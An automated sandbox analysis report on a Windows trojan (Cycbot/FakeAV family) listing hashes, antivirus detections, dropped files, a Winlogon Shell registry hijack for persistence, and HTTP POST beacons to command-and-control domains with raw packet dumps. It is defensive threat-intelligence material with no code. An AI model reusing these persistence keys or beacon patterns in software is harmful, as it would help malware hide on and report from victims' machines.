Analysis Date: 2014-06-15 06:53:24
MD5: dead140fa566f3919e4fa4700ed4ab3d
SHA1: 9b24db367e076c9e3b7e8d47931061d28265fbcb

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: e57d2abc15743b6812b11c8ac46f8dbe sha1: 42b1aa3a591c7abdb52ccc729b4cf85cdc112519 size: 69120
Section .rdata: md5: 0c15be8620c262cec62fba329eb44b24 sha1: a983d3deab0a67254b02a2a26614fd60f3bd58aa size: 4096
Section .data: md5: bf323e9fdffa88927fa867cfb0d4adaf sha1: 08d0735d07100ff9620f3b6b63d1a283cb96d813 size: 45056
Section .rsrc: md5: 9e9f8fc798ebc40571cc054577fd4d9d sha1: 8cbeb2ee2a2ee84fd8e5f08e2040ed8ef2d06a5c size: 1024
Timestamp: 2005-09-23 17:25:27
Version: PrivateBuild: 1091
FileDescription: MS Shell
PEhash: 33e5c82d004221545e7cc94302c656f6eca5783f
IMPhash: 15148e429baf6edf934b7822e8cfaf4d
AV 360 Safe: Gen:Variant.Kazy.2365
AV Ad-Aware: Gen:Variant.Kazy.2365
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): Downloader.Fraudload.Hdx
AV Authentium: W32/Goolbot.B.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen
AV CA (E-Trust Ino): Win32/FakeAV.S!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Win.Trojan.Fakeav-53415
AV Dr. Web: Trojan.Siggen2.7668
AV Emsisoft: Gen:Variant.Kazy.2365
AV Eset (nod32): Win32/Kryptik.IAV
AV Fortinet: W32/FakeAV.BZD!tr
AV Frisk (f-prot): W32/Goolbot.B.gen!Eldorado (generic, not disinfectable)
AV F-Secure: Gen:Variant.Kazy.2365
AV Grisoft (avg): Cryptic.BFI
AV Ikarus: Trojan.Win32.FakeAV
AV Kaspersky: Trojan-Downloader.Win32.FraudLoad.hdx
AV MalwareBytes: Backdoor.Gbot
AV Mcafee: BackDoor-EXI
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Variant.Kazy.2365
AV Norman: swizzor/Heur.I
AV Rising: Trojan.Win32.Generic.12575EC8
AV Sophos: Troj/FakeAv-BWP
AV Symantec: Trojan.FakeAV!gen39
AV Trend Micro: BKDR_CYCBOT.SME
AV VirusBlokAda (vba32): TrojanDownloader.FraudLoad

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\stor.cfg
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutex: {655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS: www.google.com
Winsock DNS: 127.0.0.1
Winsock DNS: checkserverstatux.com
Winsock DNS: whysohardx.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe

Network Details:

DNS: www.google.com (Type: A) ➝ 64.233.171.99
DNS: www.google.com (Type: A) ➝ 64.233.171.147
DNS: www.google.com (Type: A) ➝ 64.233.171.106
DNS: www.google.com (Type: A) ➝ 64.233.171.105
DNS: www.google.com (Type: A) ➝ 64.233.171.104
DNS: www.google.com (Type: A) ➝ 64.233.171.103
DNS: protectyourpc-11.com (Type: A) ➝ 69.43.161.170
DNS: checkserverstatux.com (Type: A)
DNS: whysohardx.com (Type: A)
HTTP GET: http://www.google.com/
User-Agent:
HTTP GET: http://www.google.com/
User-Agent:
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=main&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err084&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err095_2_4&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 64.233.171.99:80
Flows TCP: 192.168.1.1:1032 ➝ 64.233.171.99:80
Flows TCP: 192.168.1.1:1033 ➝ 69.43.161.170:80
Flows TCP: 192.168.1.1:1034 ➝ 69.43.161.170:80
Flows TCP: 192.168.1.1:1035 ➝ 69.43.161.170:80

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a                      */*....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a                      */*....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 32267379 7374656d   ype=g_v42&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d6d 61696e26 6e3d3026   status=main&n=0&
0x00000070 (00112)   65787472 613d3020 48545450 2f312e31   extra=0 HTTP/1.1
0x00000080 (00128)   0d0a486f 73743a20 70726f74 65637479   ..Host: protecty
0x00000090 (00144)   6f757270 632d3131 2e636f6d 0d0a5573   ourpc-11.com..Us
0x000000a0 (00160)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x000000b0 (00176)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x000000c0 (00192)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x000000d0 (00208)   646f7773 204e5420 352e3129 0d0a436f   dows NT 5.1)..Co
0x000000e0 (00224)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x000000f0 (00240)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000100 (00256)   73650d0a 0d0a                         se....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 32267379 7374656d   ype=g_v42&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 34266e3d   status=err084&n=
0x00000070 (00112)   30266578 7472613d 30204854 54502f31   0&extra=0 HTTP/1
0x00000080 (00128)   2e310d0a 486f7374 3a207072 6f746563   .1..Host: protec
0x00000090 (00144)   74796f75 7270632d 31312e63 6f6d0d0a   tyourpc-11.com..
0x000000a0 (00160)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x000000b0 (00176)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x000000c0 (00192)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x000000d0 (00208)   696e646f 7773204e 5420352e 31290d0a   indows NT 5.1)..
0x000000e0 (00224)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000f0 (00240)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000100 (00256)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 32267379 7374656d   ype=g_v42&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723039 355f325f   status=err095_2_
0x00000070 (00112)   34266e3d 30266578 7472613d 30204854   4&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 73207365   n: close....s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings